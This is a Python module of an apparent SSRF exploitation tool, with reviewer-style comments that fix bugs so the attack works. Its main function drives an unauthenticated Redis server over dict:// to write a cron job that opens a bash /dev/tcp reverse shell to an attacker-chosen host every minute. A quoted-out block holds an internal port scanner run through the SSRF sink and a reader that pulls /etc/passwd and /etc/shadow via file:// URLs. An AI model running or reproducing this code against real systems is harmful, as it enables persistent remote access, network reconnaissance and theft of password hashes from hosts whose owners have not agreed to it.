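def _redis_dict_url(url, redis_ip, command):
    """Build the SSRF URL that makes the vulnerable server speak ``command`` to Redis.

    ``url`` is used verbatim as a prefix, so it is expected to already end in the
    injectable parameter (e.g. ``host/page?u=``) — the ``dict://`` part is
    appended straight after it, exactly as in the original payloads.
    """
    return "http://{target}dict://{ip}:6379/{command}".format(
        target=url, ip=redis_ip, command=command)


def _send(payload):
    """GET ``payload`` through the SSRF sink and echo a non-empty body; returns the body."""
    body = requests.get(payload).content
    if body:
        print(body)
    return body


def main(args):
    """Plant a reverse-shell cron entry by driving Redis over dict:// through an SSRF sink.

    Only run this against a target you are explicitly authorised to test: a
    successful run leaves a persistent cron job on the host running Redis that
    connects back to ``args.bip:args.bport`` every minute.

    Args:
        args: parsed CLI options (presumably argparse). Attributes read:
            ``url`` — the SSRF endpoint prefix (see _redis_dict_url),
            ``redis_ip`` — the Redis address as seen from the SSRF host,
            ``bip``/``bport`` — the listener the planted ``/bin/bash -i`` dials.

    Returns:
        None. Every non-empty Redis response body is printed.

    The chain is one dict:// request per Redis command. No AUTH is sent, so the
    instance has to accept unauthenticated commands, and it must be able to
    write ``/etc/crontab``:
      1. SET 0 "<cron line with the bash /dev/tcp reverse shell>"
      2. CONFIG SET dir /etc
      3. CONFIG SET dbfilename crontab
      4. SAVE  -> the RDB dump is written to /etc/crontab
    The crontab location differs per distro; the dir/dbfilename pair used
    here only matches the Ubuntu layout:
      ubuntu  /etc/crontab
      centos  /var/spool/cron/root
      debian  /var/spool/cron/crontabs/root
    """
    url = args.url
    redis_ip = args.redis_ip
    bip = args.bip
    bport = args.bport
    logging.info("Starting to connect redis_ip and exec redis command.....")

    # Cron line as Redis sees it: "*/1 * * * * /bin/bash -i >& /dev/tcp/<bip>/<bport> 0>&1",
    # padded with \x0a so the RDB header/trailer around it ends up on their own lines.
    # Fix: the original template used {$bip}/{$bport}, which str.format() rejects
    # with KeyError, so the first request never went out. The trailing
    # backslash-space is part of the original payload and is kept (written as
    # an explicit "\\ " so the interpreter stops warning about an invalid escape).
    cron_set = ('set:0:"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i'
                '\\x20>\\x26\\x20/dev/tcp/{bip}/{bport}\\x200>\\x261\\x0a\\x0a\\x0a\\ '
                ).format(bip=bip, bport=bport)

    # Note the first command has no "data=" prefix while the others do — kept
    # exactly as in the original payloads.
    commands = [
        cron_set,
        "data=config:set:dir:/etc",
        "data=config:set:dbfilename:crontab",
        "data=save",
    ]
    # Fix: the original fetched payload2 for steps 3 and 4 as well (copy/paste
    # slip), so dbfilename was never set and SAVE never issued.
    for command in commands:
        _send(_redis_dict_url(url, redis_ip, command))

# NOTE(review): the triple quote below is preserved from the original file; it
# appears to open a quoted-out block that runs to the end of this module section.
'''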
def _open_port(self, ip: str = '') -> list:
    """Probe every port in ``self.ports`` on ``ip`` through the SSRF sink using dict:// URLs.

    Args:
        ip: address to probe as seen from the SSRF host; empty/falsy means the
            SSRF host's own loopback (``127.0.0.1``).

    Returns:
        De-duplicated list (order not preserved) of ports judged open: ports
        whose response digest differs from the baseline ``self.hash_limit()``
        returns, or every responding port when there is no baseline. Ports
        with an empty response body are never reported.

    Relies on ``self.target``, ``self.parameter``, ``self.ports``,
    ``self.hash`` and ``self.hash_limit()`` from the enclosing class, and on
    the module-level ``get_requests`` helper.

    NOTE(review): ``self.hash.update(...)`` is called cumulatively, so each
    port's hexdigest covers the concatenation of all responses seen so far in
    this call — two ports with identical bodies still get different digests,
    which skews the comparison against the baseline. Hashing a copy of
    ``self.hash`` per response (``self.hash.copy()``, if it is a hashlib
    object) would give a per-port digest; confirm how ``hash_limit()`` derives
    its value before changing this.
    """
    hash_judge = []
    open_port = []
    if ip:
        pass
    else:
        ip = '127.0.0.1'
    logging.info("Starting detect open ports in ip:{}.....".format(ip))
    for port in self.ports:
        hash_values = {}
        # The SSRF'd server speaks dict:// to ip:port; the body it relays is
        # the only signal we get about the port's state.
        payload = "{url}?{query}=dict://{ip}:{port}".format(
            url=self.target, query=self.parameter, ip=ip, port=port)
        port_conn = get_requests(payload).text
        if port_conn:
            # Cumulative update — see the NOTE in the docstring.
            self.hash.update(port_conn.encode('utf-8'))
            hash_values['port'] = port
            hash_values['hash'] = self.hash.hexdigest()
            hash_judge.append(hash_values)
        else:
            pass
    # Baseline digest of a "closed/unreachable" response, if the class provides one.
    hash_limit_value = self.hash_limit()
    if hash_limit_value:
        for i in hash_judge:
            if hash_limit_value != i['hash']:
                open_port.append(i['port'])
    else:
        # No baseline: anything that answered at all counts as open.
        for j in hash_judge:
            open_port.append(j['port'])
    return list(set(open_port))
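def host_port(self):
    """Worker loop: drain ``self.queue`` of IPs and port-scan each one through the SSRF sink.

    For every IP taken from the queue, ``self._open_port(ip=ip)`` is run and
    any ports found are appended to ``host_port.log`` via ``out_put`` and
    logged. Timeouts from the SSRF request are treated as "nothing found" for
    that IP and the loop moves on; any other error is logged with its
    traceback and stops this worker. Returns None.

    Fix: the success log used ``self.ip``, which this method never sets — the
    resulting AttributeError was swallowed by the bare ``except Exception:
    break``, so a worker silently died right after its first hit. The local
    ``ip`` is what was meant, and unexpected errors are now logged instead of
    hidden. ``queue.Empty`` is handled explicitly so several workers sharing
    one queue do not race on ``empty()`` followed by ``get_nowait()``.
    """
    while True:
        try:
            ip = self.queue.get_nowait()
        except queue.Empty:
            break  # queue drained (or another worker took the last item)
        try:
            ip_port = self._open_port(ip=ip)
            if ip_port:
                out_put(self.target, 'host_port.log', ip_port)
                logging.info("the {} found open port is: {}".format(ip, ip_port))
        except (requests.exceptions.ReadTimeout,
                requests.exceptions.ConnectTimeout):
            # Best-effort: a slow/unreachable host is skipped, not fatal.
            logging.debug("timeout while scanning %s, skipping", ip)
        except Exception:
            logging.exception("unexpected error while scanning %s; worker stopping", ip)
            break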
def file_reader(target, parameter):
    """Pull a fixed set of local files off the SSRF host via ``file://`` URLs.

    Args:
        target: base URL of the vulnerable endpoint.
        parameter: name of the query parameter the server fetches.

    Returns:
        None. Distinct, whitespace-stripped bodies of every file that came
        back are handed to ``out_put`` under ``file_content.log`` (order not
        preserved); the paths that answered are logged. Nothing is written
        when no file was retrieved.

    The list includes ``/etc/passwd`` and ``/etc/shadow``, i.e. account and
    password-hash data: whatever ``out_put`` writes should be handled as
    sensitive engagement evidence and removed afterwards. Only use against a
    target you are authorised to test.
    """
    candidates = (
        '/etc/rsyslog.conf',
        '/etc/syslog.conf',
        '/etc/passwd',
        '/etc/shadow',
        '/etc/group',
        '/etc/anacrontab',
        '/etc/networks',
        '/etc/hosts',
    )
    logging.info("Use the protocol to get the contents of the file.....")
    # (path, body) for every request whose response was truthy.
    fetched = []
    for candidate in candidates:
        probe = "{url}?{query}=file://{path}".format(
            url=target, query=parameter, path=candidate)
        response = get_requests(probe)
        if not response:
            continue
        fetched.append((candidate, response.text.strip()))
    if not fetched:
        return
    answered = [path for path, _ in fetched]
    bodies = [body for _, body in fetched]
    logging.info("Save file content: {}".format(answered))
    out_put(target, 'file_content.log', list(set(bodies)))
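def run(target, parameter, ip_c=''):
    """Scan the SSRF host's loopback, then (optionally) neighbouring hosts, with Scan workers.

    Args:
        target: base URL of the vulnerable endpoint.
        parameter: query parameter the server fetches.
        ip_c: first three octets of the internal network to sweep (``"10.0.0"``);
            empty skips the sweep.

    Returns:
        None. Loopback results go to ``host_port.log`` via ``out_put`` and the
        log; each worker records its own hits the same way.

    Fix: ``threading.Thread(target=Scan(...).host_port())`` called
    ``host_port()`` right there on the main thread and handed its return value
    (None) to the thread, and ``start(); join()`` inside the loop serialised
    the workers anyway — the 20 "threads" were doing nothing concurrently.
    The method is now passed as a callable, all workers are started first and
    joined afterwards.

    NOTE(review): ``range(105, 106)`` queues only ``ip_c.105``; this is kept
    from the original and looks like a debugging leftover — a full sweep would
    be ``range(1, 255)``. Confirm the intended range before widening it.
    """
    threads_count = 20
    ip_queue = queue.Queue()  # shared work queue of IPs for the workers

    # Always start with the SSRF host itself (empty ip => 127.0.0.1 in _open_port).
    open_port = Scan(target, parameter)._open_port()
    out_put(target, 'host_port.log', open_port)
    logging.info("127.0.0.1 host found open port is: {}".format(open_port))

    if ip_c:
        logging.info("Starting to detct the other ip ....")
        for d in range(105, 106):
            ip_queue.put('{0}.{1}'.format(ip_c, d))

    # One Scan per worker so per-instance state (its hash object) is not shared.
    workers = []
    for _ in range(threads_count):
        worker = threading.Thread(
            target=Scan(target, parameter, queue=ip_queue).host_port)
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
'''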